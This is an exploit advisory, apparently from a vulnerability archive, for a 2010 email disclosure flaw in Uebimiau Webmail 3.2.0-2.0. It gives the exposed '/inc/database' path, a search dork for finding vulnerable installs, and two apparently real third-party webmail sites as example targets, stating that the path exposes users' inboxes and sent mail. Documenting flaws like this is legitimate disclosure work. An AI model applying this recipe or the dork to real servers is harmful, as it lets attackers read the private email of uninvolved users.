Uebimiau Webmail version 3.2.0-2.0 suffers from a remote email disclosure vulnerability.
ea0bc6af067b507336b4a9504121ccc06cd53f5e26033bc9cf839f9d8229fd21
# Exploit Title: Uebimiau Webmail v3.2.0-2.0 | Email Disclosure
# Date: 09 March 2010
# Author: Z3r0c0re, R4vax
# Software Link: http://www.uebimiau.org/download.php
# Version: 3.2.0-2.0
# Tested on: php
# Code :
*********************************************************
* Uebimiau Webmail Email Disclosure *
*********************************************************
* Examples: *
* E.g.1 http://www.rufino.eti.br/webmail/inc/database/ *
* E.g.2 http://mail.siens.com.br/webmail3/inc/database/*
*********************************************************
* D0rk: *
* "Uebimiau Webmail v3.2.0-2.0" *
*********************************************************
* Vuln: *
* http://[host]/[path]/inc/database *
*********************************************************
* Desc: *
* accessing these directores lets you view the users- *
* inboxes and sent emails and any other folders the- *
* user may have. *
*********************************************************
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed